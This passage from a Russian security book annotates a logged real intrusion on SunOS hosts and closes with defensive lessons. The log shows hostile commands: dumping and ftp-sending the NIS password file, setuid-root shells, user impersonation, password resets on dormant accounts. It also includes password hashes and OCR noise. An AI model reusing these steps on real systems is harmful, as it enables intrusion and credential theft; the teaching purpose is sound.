Некоторые могли здесь и остаться, днем поддерживая корпоративные сети, а по ночам ата­ куя политические цели. Атаки «хактивистов» простираются от причинения беспокойства объектам атаки посредством искажения внешнего вида веб-сайтов до прямого экономиче­ ского вредительства.

Очевидно, в такую категорию входят как разочаровавшиеся идеалисты, так и религиозные фанатики. «Хактивизм» тем не менее не может сводиться к ограниченному кругу подозре­ ваемых. «Хактивистами» могут стать экстремисты любых мастей. Сюда могут входить ра­ дикально настроенные защитники прав животных и экстремисты среди защитников природы. Возможности есть у каждого, кто имеет политическую программу и доступ в сеть. Действительно, наибольшая угроза может исходить от изгоев (таких, как «Унабом бер») с целями, важными только для себя, для страны или террористической организации.

О применяемых инструментах Теперь, когда вы знаете, на кого в действительности похож хакер (на любого из нас!), вы, вероятно, размышляете о том, какую подготовку надо иметь для такой трудной работы.

К сожалению, небольшую.

Хакеры используют различные инструменты для взлома систем и скрытия своих следов, чтобы избежать обнаружения. Миф об исключительности хакеров, несомненно, возник из-за того, что инструменты их ремесла являются действительно выдающимися шедевра­ ми программирования. Однако немногие хакеры сами пишут программы для используе­ мых ими инструментов. Большинство из них являются рядовыми солдатами, просто со­ бирающими необходимые им инструменты из открытых источников. Насколько откры­ тых? Непродолжительная прогулка по Интернету покажет вам, как легко можно получить многие из хакерских инструментов. А теперь добавьте к этому все то, что можно получить в подпольной среде. Все, что для этого нужно, - это «зарегистрироваться» в хакерской электронной доске объявлений и получить доступ к другим хакерам, и вас будут постоян­ но снабжать новейшими и превосходными инструментами для поиска и кражи информа­ ции. Это похоже на клуб - один хакер передает найденный им инструмент другому хакеру, который передает его еще одному хакеру, и т. д. И чем больше инструментов имеет хакер, тем легче ему будет взломать вашу систему.

Прогулка с хакером Остальная часть этой главы покажет вам, что будет делать хакер после того, как он окажет­ ся в зашей сети. Это реальная расшифровка действительно произошедшего взлома. В дан­ ном случае эксперт по безопасности подвергшейся нападению компании обнаружил вторжение и записал каждое нажатие клавиши, 1. Unabomber («Университетский бомбер») - университетский неудачник, терроризировал американское население, посылая взрывающиеся письма, -- Примеч. пер.

Прогулка хакера по сети В ходе этой прогулки помните, что хакер искал информацию и доступ к другим системам для получения еще большего количества информации. Компании, о которой идет речь, по­ везло по двум причинам. Во-первых, они обнаружили хакера сразу после начала атаки.

Во-вторых, им невероятно повезло в том, что хакер просто «разглядывал витрины» и не оставил за собой каких-либо разрушений.

Идя за хакером, также помните, что он может в следующей своей прогулке забрести и в вашу округу...

Что делал хакер...

Строка № Когда этот хакер взломал систему в декабре, он использовал гостевую учетную запись, созданную без пароля. После того как он взломал систему, он добавил свой собственный пароль к гостевой учетной записи и учетной записи, названной "ingres", после чего он мог легко получать доступ с регистрацией в любое удобное время2.

Строка № Команда "who" проверяет и показывает, нет ли кого еще в системе. Наш друг не хочет, что­ бы кто-либо в системе его заметил.

Строка № Эта строка копирует коммуникационную программу, названную "kermit", в текущий рабочий каталог хакера. После этого он может использовать kermit для пересылки инстру­ ментов для работы с защитой, которые он будет применять для получения доступа к сис­ темам и информации. Заметьте, что большинство хакеров пересылают свои собственные инструменты для работы с защитой, чтобы упростить себе работу. Некоторые хакеры слишком мало знают об операционных системах и просто используют инструменты, напи­ санные людьми, которые в этом действительно разбираются.

Строки с № 6 по № Теперь хакер использует известную программную ошибку для получения прав суперполь­ зователя по доступу к системе. (Хакер пишет несколько строк программы для переполне­ ния буфера в rdist и затем засылает команды в rdist, которые исполняются.) Если бы в сис­ тему были установлены правильные патчи, то это не было возможным!

I valley% sh 2$ who 3 ingres ttypO Jan 18 23: 4 root ttyp2 Jan 15 18:38 (canyon) 5 $ cp /home2/jeff/bin/kermit,orig kermit 6 $ kermit 7 C-Kermit 5A(178) ALPHA, 29 Jan 92, SUNOS 4.1 (BSD) 8 Type ? or HELP for help 9 C-Kermit>rece fi 10 Escape back to your local Kermit and give a SEND command...

11 # N. - Примеч. пер.

2. Из листинга видно, что данный взлом происходит уже после декабрьского - в январе Что делал хакер...

120Yz*@-#Y1-N!y- %!YfiO 14#"Y@ 15##YA 16#$YB 17#%YC 18#&YD 19C-Kermit> 20 Stopped 21 valley% sh 22 Stopped (signal) 23 valley% sh 24 переполняет буфер (удалено из соображений безопасности) 25 $ /tmp/sh Строки с № 26 по № Хакер теперь имеет права доступа суперпользователя (root). Он уже внутри! Он устанав­ ливает режим и разрешения и изменяет имя на нечто такое, что он, вероятно, не забудет.

Заметьте, что он удаляет файл /tmp/sh, так как не хочет оставлять какого-либо следа своего визита.

Строка № Он ошибается в написании команды.

Строки с № 29 по № Он выдает команду ls (list) с параметром -t (time), определяющим формирование списка файлов каталога с новейшими файлами в начале списка. Выдается список файлов.

Строки с № 46 по № Просто еще одна проверка на отсутствие в системе кого-либо. Большинство хакеров про­ должают проверять систему на наличие в ней других регистрации на протяжении всей атаки.

Строка № Здесь он использует команду grep для поиска строки "est". (Параметр -i говорит UNIX, что допустимы символы как верхнего, так и нижнего регистров.) Предположительно, хакер ищет наличие других регистрации в системе из домена DNS ".West". (Если вы не знакомы с UNIX, то "grep" - это общая команда, расшифровывающаяся как Grab Regular Expres­ sion. В основном grep используется для поиска в системе конкретной строки, имеющейся в файлах этой системы.) 26 # rm /tmp/sh 27 rm: override protection 755 for /tmp/sh? у 28 # Isll 29 # Is -tal 30 total 31 drwxr-xr-x4 ingres 512 Jan 18 23:04.

Прогулка хакера по сети 32 -rwsrwsrwx 1 root 24576 Jan 18 23:04 suck 33 -rw-r--r--1 root 61 Jan 18 23:04 c.c 34 -rwxr-xr-x 1 ingres 442368 Jan 18 23:03 kermit 35 -rwxrwxrwx 1 ingres 360448 Jan 16 11:02 testit 36 drwxr-xr-x 30 root 1024 Dec 18 20:27..

37 -rw-r-r--1 ingres 1148 Jun 9 1992 foo 38 drwxrwsrwx 6 ingres 6144 Aug 23 1991 SERVICE 39 -rwxr-xr-x 1 ingres 106496 Feb 25 1991 sun4Jookup 40 -rwxr-xr-x 1 ingres 98304 Feb 25 1991 sun3_lookup 41 drwxr-xr-x 3 ingres 512 Jan 23 1991 quoter 42 -rw-r-r--1 ingres 306 Nov 20 1987.cshrc 43 -rw-r-r- 1 ingres 1159 Nov 20 1987.install 44 -Г--Г--Г--1 ingres 20 Nov 20 1987.version 45 -rw-r--r- 1 ingres 36 Jan 26 1987.oemstring 46 # who 47 ingres ttypO Jan 18 23: 48 root ttyp2 Jan 15 18:38 (canyon) 49 # last | grep -i est Строки с №50 по Теперь он ищет что-то конкретное - "lorin". Очевидно, "lorin" не входил в систему с того времени, как хакер в последний раз взломал систему и удалил файл с учетными записями (16 января). Хакер пытается найти "lorin" в /etc/passwd с помощью команды grep, но оши­ бается при наборе команды. Затем он вспоминает, что именем пользователя, о котором он думает, является "lorimo", а не "lorin". Это значит, что наш парень побывал здесь раньше.

Строки с № 58 по Взломщик редактирует программу С, чтобы изменить ID пользователя на 21477. Эта но­ вая настройка позволяет ему переключить пользователя на "lorimo".

Строки с № 62 по № Еще больше опечаток. Этому парню надо пойти на курсы для машинисток.

Строки с № 67 по № Здесь хакер компилирует новую версию своего исполняемого кода, дает результату (a.out) другое имя, которое он не забудет (у него превосходный словарь). Исполнив два из своих рабочих скриптов, он изменяет свой ID пользователя.

50 # last lorin 51 wtmp begins Sat Jan 16 11: 52 # grep lor /etc/passwwd 53 grep: /etc/passwwd: No such file or directory 54 # grep lor /etc/passwd 55 # ypcat passwd | grep lor 56 lori:N.4Pgz4iUS8kk:5734:50:Lori:/home/lori:/bin/csh 57 lorimo:xxTTF8y3fSqGo:21477:50:Lori:/home/lorimo:/bin/csh Что делал хакер...

58 # ed с.с 59/uid/ 60 setuid(0);

61 setuid(21477);

62 # сс.сс 63 сс: Warning: File with unknown suffix (.cc) passed to Id 64 Id:.cc: No such file or directory 65 # cc "c 66>"C 67 # cc c.c 68 # mv a.out shit 69 # chmod 6777 shit 70 #./suck 71 # id 72 uid=0(root) gid=0(wheel) groups= 73 #./shit 74$ id 75 uid=21477(lorimo) gid=0(wheel) groups= Строки с № 76 по № Теперь он ищет, куда еще можно пойти, посылая команды rlogin в другие системы и опре­ деляя те из них, которые бы доверяли lorimo (файлы.rhosts и /etc/hosts.equiv используют­ ся для установления доверия между системами). Если lorimo доверяют другие системы, то хакеру будет предоставлен доступ к этим системам без ввода пароля. Это называется «барабанить в двери» ("door rattling"). Если ему повезет, то он получит доступ к еще боль­ шему объему информации и создаст места для запуска будущих атак изнутри.

Строка № Хакер сменил свою авторизацию обратно на суперпользователя (root).

Строки с № 90 по № Он снова оглядывается (отсюда и команда "who"), затем проводит двойной контроль пра­ вильности полученной информации ID пользователя.

Строки с № 93 по № Хакер ищет lorimo в таблице паролей сетевой информационной службы NIS.

Строка № Хакер переходит в каталог /home.

76 $ rlogin tsunami 77 Password:

78 Login incorrect 79 Login incorrect 80 login: AD 81 Connection closed.

Прогулка хакера по сети 82 $ rlogjn suntzu 83 rlogjn: not found 84 $ rlogin suntzu 85 Password:

86 Login incorrect 87 login: D 88 Connection closed.

89 $"D 90 «who 91 ingres ttyp0 Jan 18 23: 92 root ttyp2 Jan 15 18:38 (canyon) 93 # ypcat passwd | grep lorimo 94 lorimo:xxYTF8y3fSqGo:21477:50:Lori :/home/lorimo:/bin/csh 95 # cd /home Строка № Хакер начинает подготовительную работу по поиску файлов.rhost, имеющихся в /home.

Смысл такого поиска состоит в том, что некоторые люди, использующие файл.rhost (для установки доверия), могут иметь много записей в.rhost по всей сети. После запуска этой задачи он пошел дальше.

Строки с № 97 по № Хакер продолжает делать опечатки.

Строки с № 99 по № Нашему другу надоело быть lorimo. Он проверяет файл паролей на наличие jeff. Он реша­ ет выдать себя за jeff. Но вначале он должен отредактировать свой код.

Строки с № 101 по № ИЗ Он пытается редактировать свой код, но он не в том каталоге. Он переходит в правильный каталог, редактирует код, исполняет код и становится пользователем jeff.

Строки с № 114 по № Став jeff хакер сделал правильный выбор. Он вошел в новую систему (tsunami), даже не пользуясь паролем. (Это отличный пример того, как опасно устанавливать доверительные отношения между системами.) 96 # find. -name.rhosts -print & 97 # gupr 98 # grep"C 99 # ypcat passwd | grep jeff 100 jeff:wW/q0t03L6xO.:13147:50:Jeff :/home/jeff:/bin/csh 101 # ed c.c 102 ?c,c: No such file or directory 103 #cd 104 # edc.c 150 Что делал хакер...

105/uid/ 106setuid(21477);

107setuid(13147);

108#ссс.с 109 # mv a.out shit 110 #chmod 6777 shit 111 #./shit 112 $ id 113 uid=13147(jeff) gid=0(wheel) groups= 114 $ rlogj tsunami 115 rlogj: not found 116$ rlogin tsunami 117 No directory! Logging in with home=/ 118 SunOS Release 4.1.2 (TSUNAMI) #3: Sat Oct 24 07:56:45 PDT 119 You have new mail.

Строки с № 120 по № Хакер (который сейчас является пользователем jeff), запускает командную оболочку sh, чтобы не оставлять след в журналах.history оболочки csh. (Хакер тщательно следит за тем, чтобы не оставить свидетельств применения своих команд.) Затем он проверяет, нет ли кого еще в системе.

Строки с № 127 по № Хакер пытается скопировать файл паролей и получает отказ в разрешении, так как у него нет разрешения копировать в этот каталог. Он проводит проверку с целью установить, под каким именем он зарегистрировался (должно быть, он уже его забыл). Он видит, что заре­ гистрировался как Jeff. Так как Jeff не имеет разрешения копировать файлы в этот каталог, то хакер меняет каталог на /tmp, в который любому пользователю разрешено производить копирование.

Строки с № 137 по № Здесь он немного расправляет крылья и ищет таблицу паролей, чтобы ее скопировать и ис­ пользовать. (Он копирует файл паролей NIS в файл, названный "ааа".) Хакеры часто ко­ пируют файлы паролей, чтобы подвергнуть их действию программ-взломщиков и получить больше паролей. Чем больше паролей есть у хакера, тем лучше он преуспеет в набегах на дру­ гие системы.

120tsunami%AC 121 tsunami%sh 122$ who 123 wendy ttyp2 Jan 6 13:55 (arawana) 124 derek ttyp3 Jan 13 17:57 (lajolla) 125 derekttyp4Jan 15 13:11 (lajolla) 126 jeff ttyp5 Jan 18 23:09 (valley) 127 $cat/etc/passwdAC Прогулка хакера по сети 128$ypcaty"C 129 $ ypcat passwd > suna 130 suna: Permission denied 131 Sid 132 uid=4401(jeff) gid=50(lastaff) groups=50(lastaff) 133$pwd 134 $cd 135$pwd. 136$cd/tmp 137$ ypcat passwd >aaa 138 $ Is -tal aa 139 aa not found 140 $ is -tal aaa 141 -rw-r—r— 1 jeff 15382 Jan 18 23:09 aaa Строки с № 142 по № Теперь он открывает сессию ftp обратно к первоначальному хосту (valley) как пользова­ тель ingres. В этой сессии он копирует файл паролей в систему valley. В той же самой сес­ сии он копирует свои инструменты по работе с защитой из valley в tsunami.

Строки с № 163 по № Снова он воссоздает свою небольшую С-программу (опущенную по соображениям безо­ пасности) для того, чтобы воспользоваться программной ошибкой, открывающей защиту, и получить права доступа суперпользователя (root). Теперь он имеет полный контроль (доступ root) над системой tsunami.

142$ ftp valley 143 Connected to valley 144 220 valley FTP server (SunOS 4.1) ready.

145 Name (valley:jeff): ingres 146 331 Password required for ingres.

147 Password:

148 230 User ingres logged in.

149 ftp> send aaa 150 200 PORT command successful.

151 150 ASCII data connection for aaa 152 226 ASCII Transfer complete.

153 local: aaa remote: aaa 154 15578 bytes sent in 0.063 seconds (2.4e+02 Kbytes/s) 155 ftp> get foo 156 200 PORT command successful.

157 150 ASCII data connection for foo 158 226 ASCII Transfer complete.

159 local: foo remote: foo 160 1155 bytes received in 0.11 seconds (9.9 Kbytes/s) 152 Что делал хакер...

161 ftp> quit 162 221 Goodbye.

163 $ cat too | /usr/ucb/rdist -Server localhost 164$/tmp/sh 165#rmfoo • 166#rm/tmp/sh 167 rm: override protection 755 for /tmp/sh? у 168#edc.c 169#ccc.c 170 #chmod 6777 a.out 171 #./a.out 172 # id 173 uid=0(root) gid=0(wheel) groups=50(iastaff) Строки с № 174 по № Хакер ищет, есть ли в файле /etc/passwd какие-нибудь записи password.old или другие из­ менения. Он также пытается изменить пароль Jeff в NIS, но безуспешно.

Строки с № 183 по № На этот раз он выводит список содержимого файла /etc/passwd.

174 # Is -ta! /etc/*ass* 175 -rw-r--r--1 root 634 Dec 7 12:31 /etc/passwd 176#cat/etc/}4U 177passwd 178 cat: /etc/}4: No such file or directory 179 Changing NIS password for jeff on suntzu.

180 Old password:

181 New password:

182 Password unchanged.

• 183 # cat/etc/passwd 184 root:R7QCfnYR4gvzU:0:1 :Operator:/:/bin/csh 185nobody:*:65534:65534::/:

186daemon:*;

1:1::/:

187sys:*:2:2::/:/bin/csh 188bin:*:3:3::/bin:

189 uucp:*:4:8::/var/spool/uucppublic:

190 news:*:6:6::/var/spool/news:/bin/csh 191 ingres:*:7:7::/usr/ingres:/bin/csh 192 audit:*:9:9::/etc/security/audit:/bin/csh 193 sync: :1:1::/:/bin/sync 194 sysdiag:*:0;

1:Old System Diag:/usr/diag/sysdiag:/usr/diag/ sysdiag/sysdiag sundiag:*:0:1 :System Diag :/usr/diag/su ndiag :/usr/diag/ sundiag/ sundiag Прогулка хакера по сети 195 operator: INtDk7crldKh2:5:5 -Account forbackups;

/usr/ backup:

/bin/csh 196 lc:u0gFO1zE9Yx9U:27:50:LC Calendar:/var/lc:/bin/csh 197+::0;

0:::

Строки с № 198 по № Хакер меняет ID пользователя с суперпользователя обратно на jeff. Затем он повторно проверяет свой ID пользователя и начинает менять имя своего a.out на такое, которое он не забудет (как он уже прежде делал). Снова он запускает команду ls -1 для получения списка с новейшими файлами в начале его.

Строки с № 210 по № Он удаляет свою локальную копию файла паролей NIS ("ааа"). Он уже скопировал этот файл на хост valley, поэтому здесь он ему не нужен. Затем удаляет свой исполняемый код и готов идти дальше.

Строки с № 213 по № Хакер проверяет, какие файловые системы подмонтированы.

198 #4) 199 # id 200 uid=4401 (jeff) gid=50(iastaff) euid=0(root) groups=50(lastaff) 201 # тс^С 202 # mv^С 203 #mv a.out shit 204 # Is -tal 205 total 206 drwxrwsrwx 3 bin 1024 Jan 18 23:12.

207 -rwsrwsrwx 1 root 24576 Jan 18 23:11 shit 208-rw-r-r-- 1 root 61 Jan 18 23:11 c.c 209 -rw-r-r- 1 jeff 15382 Jan 18 23:09 aaa 210#rmaaa ' 211 #rmc.c 212 rm: override protection 644 for c.c? у 213 #df 214 Filesystem kbytes used avail capacity Mounted on 215 /dev/sdOa 10483 5081 4354 54% / 216 /dev/sdOg 96943 78335 8914 90% /usr 217 /dev/sdOe 22927 3111 17524 15%/var 218 /dev/sd1h 1255494 1081249 48696 96% /home 219 /dev/sd3h 1255494 1030386 99559 91% /home/se 220 la:/usr/local 2097151 1154033 692365 63% /usr/local 221 suntzu:/var/spool/mail 222 445852 334295 66972 83% /var/spool/mail 154 Что делал хакер...

223 mfp:/home/sybase 318991 244337 42755 85% /home/sybase 224 арр1 :/export/sun/sun4/openwin-3, 225 189858 131073 39799 77% /usr/openwin 226 арр1 :/export/apps 1255494 771887 358057 68% /export/apps 227 appl :/export/apps 1255494 771887 358057 68% /usr/local Строки с № 228 по № Неверный ввод или, возможно шумы в линии.

Строки с № 230 по № Хакер ищет личные каталоги пользователей, находит каталог wendy и становится пользо­ вателем wendy. Но ненадолго, потому что по каким-то причинам он решает поискать поль­ зователя dan. Вероятно, хакер уже знает, что dan существует.

228 # irG-cd /home/se 229 irG-cd: not found 230 # cd/home/se 231 # Is 232 cmeyer hamant lost+found mikec wendy 233 colleen Joseph mark mikep 234 derek kevin matthews neally 235 # cd wendy 236 # cp Дтр/shit.

237 # Is -tal shit 238 -rwxr-xr-x 1 root 24576 Jan 18 23:13 shit 239 # chmod 6777 shit 240 # Is -tal shit 241 -rwsrwsrwx 1 root 24576 Jan 18 23:13 shit 242 # pwd 243 /home/se/wendy 244 # cd Amp 245 # Is -tal | more 246 total 247 drwxrwsrwx 3 bin 1024 Jan 18 23:13.

248 -rwsrwsrwx 1 root 24576 Jan 18 23:11 shit 249 -rwxr-xr-x 1 cmeyer 41 Jan 13 12:31 junk 250-rw-r--r- 1 cmeyer 12 Jan 13 12:05 junk.dat 251 -rw-r-r- 1 derek 0 Jan 12 16:07 252 (16 строк вывода удалены и хакер стал пользователем wendy) 253 hacker typos 254 # rm shit 255 # grep dan/etc/passwd 256 # ypcat passwd | grep dan 257danf:*:13602:50::/home/guest/danf:/bin/csh 258 dan:*H.6Haolt2xDu2:13601:50:& :/home/guest/dan:/bin/csh Прогулка хакера по сети Строки с № 259 по № Еще несколько тревожных взглядов вокруг (с помощью who).

Строки с № 264 по № Он снова превращается в jeff. Очевидно, что реальный jeff был в системе немного раньше хакера, который входит сейчас в suntzu как jeff. И снова пароля не требуется.

Строка № Другая смена оболочки, чтобы не оставлять отметки о себе в журналах history.

Строки с № 275 по № Хакер пытается убедиться, что /home/se подмонтирован из хоста tsunami. (Если вы помни­ те, в /home/se/wendy он оставил свой исполняемый код. Ему это было нужно для получе­ ния доступа с правами суперпользователя к этому новому хосту.) 259 # who 260 wendy ttyp2 Jan 6 13:55 (arawana) 261 derekttyp3Jan 13 17:57 (lajolla) 262 derek ttyp4 Jan 15 13:11 (lajolla) 263 jeff ttyp5 Jan 18 23:09 (valley) 264 #T> 265 $ id 266 uid=4401(jeff) gid=50(lastaff) groups=50(lastaff) 267 $ rlogin suntzu 268 Last login: Thu Jan 14 06:35:30 on ttyhl 269 SunOS Release 4.1.2 (SUNTZU.X) #2: Fri Oct 23 22:25:48 PDT 270 You have new mail.

271 suntzu% who 272 jeff ttyp0 Jan 18 23: 273 (tsunami) 274 suntzu% sh 275 $ df 276 Filesystem kbytes used avail capacity Mounted on 277 /dev/sd6a 14983 11056 2429 82% / 278 /dev/sd6g 91998 76365 6434 92% /usr 279 /dev/sd6h 445852 334297 66970 83% /var 280 /dev/sd4c 1255494 1030410 99535 91 % /home/se 281 tsunami:/home/se 1255494 1030410 99535 91% Ampjnnt/ home/se 156 Что делал хакер...

Строки с № 282 по № Хакер применяет свой исполняемый код и получает права суперпользователя на доступ к системе suntzu. В итоге он уже скомпрометировал три системы.

Строки с № 288 по № Он снова ищет пароли. (Кажется, это становится уже знакомым?) Строки с № 293 по № Хакер переходит к гостевому личному каталогу и выводит список его содержимого. Он за­ мечает в личном каталоге файл под именем dan/test.

Строка № Я удалила несколько строк из соображений конфиденциальности.

282 $ cd /home/se/wendy 283 $ Is -tal shit 284 - rwsrwsrwx 1 root 24576 Jan 18 23:13 shit 285 $./shit 286 # id 287 uid=0(root) gid=0(wheel) groups=50(lastaff) 288 # Is -tal /etcfass* 289 -rw-r-r--1 root 15465 Jan 1514:29/etc/passwd 290 -rw-r-r--1 root 15462 Dec 28 17:58/etc/passwd.OLD 291 -rw-r--r--1 root 15514 Nov 12 18:58/etc/passwd.old 292 -rw-r--r--1 root 15215 Sep 9 10:02 /etc/passwd 293 # cd /home/guests 294 /home/guests: bad directory 295 # cd /home/guest 296 # Is -tal 297 total 298 dr-xr-xr-x 10 root 512 Jan 18 23:15..

299 drwxr-xr-x 9 guestl 1024 Jan 15 16:21 guestl 300 drwxr-xr-x 11 тагу 1536 Jan 1417:37 тагу 301 drwxr-xr-x 5 jeffs 512 Jan 12 15:57 jeffs 302 drwxr-xr-x 3 eddie 512 Jan 813:04 eddie 303 drwxr-xr-x 3 sunwise 512 Jan 8 09:36 sunwise 304 drwxrwxrwx 3 brad 512 Jan 6 15:43 dan 305 # Is -tsl dan 306 total 307 1 -rw-r--r- 1 6553434 Jan 6 15:43 test 308 264 -rw-r-r- 1 dan 255563 Jul 8 1992 packet.dat 309 56 -rwxr-xr-x 3 dan 57344 Jul 1 1992 sz 310 56 -rwxr-xr-x 3 dan 57344 Jul 1 1992 sx 311 56 -rwxr-xr-x 3 dan 57344 Jul 1 1992 sb 312 40 -rwxr-xr-x 3 dan 40960 Jul 1 1992 rx 313 40 -rwxr-xr-x 3 dan 40960 Jul 1 1992 rb 314 40 -rwxr-xr-x 3 dan 40960 Jul 1 1992 rz Прогулка хакера по сети 315 896-rw-rw-rw-1 dan 901682 Jun 16 1992junk, 3161 drwxr-xr-x 2 dan 512 Oct 25 1990 doswin 317 # cat dan/test 318 Код удален по соображениям безопасности Строка № Теперь хакер ищет, кому принадлежит UID 65534, Выходит так, что этот пользователь­ ский ID не принадлежит никому.

Строки с № 320 по № Здесь он смотрит, нет ли других пользователей в системе. Его особенно интересуют те учетные записи пользователей, которые не использовались недавно, Это нужно для того, чтобы никто не заметил, как он ими пользуется. Для поиска неактивных учетных записей хакер ищет каталоги, в которых не было недавнего обращения к их файлам. Он также про­ сматривает время последних входов пользователей в систему.

319 # grep 65534 /etc/passwd 32Q#cd/home/se 321 # Is -tal 322 total 323 dr-xr-xr-x 10 root 512 Jan 18 23:15..

324 drwxr-xr-x 17 wendy 2560 Jan 18 23:13 wendy 325 drwxr-xr-x 26 hamant 4608 Jan 18 17:28 hamant 326 drwxr-xr-x 48 neally 9728 Jan 18 11:03 neally 327 drwxr-xr-x 41 derek 3584 Jan 16 03:16 derek 328 drwxr-xr-x 17 kevin 2048 Jan 15 17:04 kevin 329 drwxr-xr-x 31 mark 3072 Jan 15 16:41 mark 330 drwxr-xr-x 19 colleen 1536 Jan 15 16:15 colleen 331 drwxr-xr-x 44 matthews 4608 Jan 15 11:37 matthews 332 drwxr-xr-x 16 mikep 1536 Jan 15 11:24 mikep 333 drwxr-xr-x 2 10406 512 Dec 2 11:35 mikec 334 drwxr-xr-x 24 cmeyer 2048 Dec 1 11:11 cmeyer 335 drwxr-xr-x 15 root 512 Sep 15 17:04.

336 drwxr-xr-x 8 5542 1536 Aug 28 15:13 Joseph 337 drwxr-xr-x 2 root 512 Jul 17 1991 lost+found 338 # last ] grep eric 339 ericz ttyh 1 Mon Jan 18 08:30 - 08:32 (00:02), 340 ericz ttyh 1 Aug 30 14:25 -14:25 (00:00) 341 ericz ttyhKC 342 # id344 # grep eric /etc/passwd 345 Uace:LEkQ/KdKGcyV2:4:4:ACE:/usr/spool/uucppublic: /usr/ lib/ uucp/uucico 346 Uaim:93uUCUdUU6zdl:4:4:AIM:/usr/spool/uucppublic: /usr/ lib/ uucp/uucico 347 ericz:vt0R/k7x2W1 kY:3063:50::/home/region3/ericz:/bin/csh 348 ericc:23JjW1a5hqUSQ:4094:10:& :/home/guest/eric:/bin/csh 349 # last ericc 350 ericc ttypl ptero Mon Aug 3 18:52 -18:52 (00:00) 351 wtmp begins Wed Jul 1 18: 352 # last richp 353 richp ttypO awe Sat Jan 16 19:33 - 19:34 (00:00) 354 richp ttyp4 vela Mon Jan 11 15:59 - 16:00 (00:00) 355 richp ttyp8 vela Wed Oct 7 13:28 • 13:58 (00:29) 356 richp ttyhl Mon Oct 5 15:39- 15:41 (00:01) 357richpttyhl MonOct5 14:15- 14:18(00:02) 358 richp ttyhl Mon Oct 5 13:54 - 13:58 (00:03) 359 richp ttyp3 vela Mon Oct 5 09:43 - 09:44 (00:00) 360 richp ttyhl Wed Sep 30 17:57 - 17:57 (00:00) 361 richp ttyp2 velaTue Sep 29 14:31 -14:32 (00:00) 362 richp ttyhl Thu Sep 24 13:48 - 13:51 (00:02) 363 richp ttypl valley Wed Sep 23 19:47 -19:48 (00:00) 364 richp ttyhl Wed Sep 23 13:28 - 13:48 (00:20) 365 richp ttyhl Mon Sep 21 11:27 - 11:29 (00:02) 366 richp ttyp6 vela Fri Sep 4 09:15 - 09:16 (00:01) 367 richp ttyp5 vela Thu Sep 3 12:31 -13:00(00:28) 368 richp ttyp5 vela Thu Sep 3 12:11 -12:11 (00:00) 369 richp ttyp5 vela Thu Sep 3 11:42 -11:43 (00:00) 370 richp ttyp5 vela Thu Sep 3 10:01 -10:04(00:02) 371 wtmp begins Wed Jul 1 18: 372 # last Iwake 373 Iwake ttyp2 runcible Tue Dec 1 15:00 - 15:06 (00:06) 374 Iwake ttyp3 runcible Wed Sep 30 13:01 - 13:15(00:13) 375 Iwake ttyp2 runcible Tue Sep 22 09:12 - 09:14 (00:02) 376 Iwake ttyp2 runcible Fri Jul 24 14:40 -14:40 (00:00) 377 Iwake ttyp4 runcible Fri Jul 17 09:13 - 09:14 (00:00) 378 Iwake ttyp4 runcible Fri Jul 17 09:12 - 09:13 (00:00) 379 Iwake ttyp2 runcible Mon Jul 13 16:56 -17:02 (00:05) 380 wtmp begins Wed Jul 1 18: 381 # last eggers 382 eggers ttypO sunkist Thu Jan 7 06:40 - 06:40 (00:00) 383 eggers ttyhl Mon Nov 16 16:41 -16:42 (00:00) 384 eggers ttypl bike Mon Nov 16 16:37 -16:41 (00:03) 385 eggers ttypl bike Thu Nov 12 18:35 -18:39 (00:03) 386 eggers ftp bike Wed Oct 7 12:58 -13:03 (00:05) 387 eggers ttyp8 bike Wed Oct 7 12:53 -13:03 (00:10) 388 eggers ttypl bike Tue Oct 6 14:14-15:27(01:13) 389 eggers ttypl bike Wed Sep 23 16:25 -16:30 (00:05) 390 eggers ttypl bike Tue Sep 15 20:34 - 20:36 (00:01) Прогулка хакера по сети 391 eggersttyhl Fri Sep 11 18:39-18:39(00:00) 392eggersttyh1 Fri Sep 11 18:11 • 18:21 (00:10) 393 eggersttyhl Fri Sep 11 17:52-18:01 (00:08) Строки с № 394 по № В этом месте наш друг уже был готов уйти. Но перед этим он установил новые пароли в использованные им неактивные («спящие») учетные записи. Этот шаг сделает его сле­ дующий взлом более легким. (По этой причине вы должны всегда устанавливать новые пароли после взлома!) Строки с № 427 по № Для одного дня достаточно. Наш непрошеный гость замел свои следы (не показано из со­ ображений безопасности) и закрыл сессию.

394 # passwd ericc 395 Changing password for ericc on suntzu.

396 New password:

397 Retype new password:

398 # grep lori /etc/passwd 399 lori:FAJEq1YKw4p7.,0:5734:50:Lori:/home/guest/lori:/bin/csh 400 # pwd 401 /tmp_mnt/home/se/wendy 402 # cd /home/guests 403 /home/guests: bad directory 404 # cd /home/guest 405 # Is -tal lori 406 total 407 drwxr-xr-x 52 root 1024 Sep 12 14:25..

408 drwxr-xr-x 3 lori 512 Aug 9 18:46.

409 -rw-r-r- 1 lori 1262 Aug 9 18:46.M23set,v1. 410 drwxr-xr-x 2 lori 512 Aug 8 17:45.dist 411 -rw-r--r- 1 lori 1457Jun 7 1991.login 412 -rw-r-r- 1 lori 2687 Jun 7 1991.cshrc 413 # last lori 414 wtmp begins Wed Jul 1 18: 415 # passwd ericc 416 Changing password for ericc on suntzu 417 New password:

418 Retype new password:

419 # passwd lori 420 Changing password for lori on suntzu 421 New password:

422 Retype new password:

423 # passwd jeff 424 Changing password for jeff on suntzu Заключение 425 New password:

426 Retype new password:

л 427 # D 428 $ л 429valley%"D 430 There are stopped jobs 431 valley% logout Заключение Действительно, пугает в этом взломе то, что нарушитель никогда не будет пойман. Из мое­ го большого опыта я знаю, что он, скорее всего, сейчас где-то неподалеку, «барабанит в двери» и устанавливает новые пароли в «спящие» (неактивные) учетные записи в других сетях.

Этот пример взлома дает нам многое для того, чтобы избежать вторжений. Из него можно извлечь следующие уроки:

• Каждая учетная запись должна иметь пароль (см. строку № 1).

• Следует избегать создания «гостевых» учетных записей (см. также строку Ш 1).

• Патчи, повышающие безопасность должны устанавливаться на каждую машину в сети (см. строки с № 6 по № 23).

• Нужно с осторожностью устанавливать доверие между системами (см. строки с № 105 по № 119, с № 264 по № 270 и с № 282 по № 287).

• Необходимо регулярно удалять «спящие» учетные записи. Хакеры часто ищут «спящие» учетные записи, так как никто, скорее всего, не заметит, как кто-то ис­ пользует его учетную запись (см. строки с № 320 по № 393), • Всегда нужно устанавливать новые пароли после успешного взлома (см. строки с № 394 по № 426).

Приложение А Люди и продукты, о которых следует знать • Создание и поддержка безопасной сетевой среды требуют определенных затрат времени.

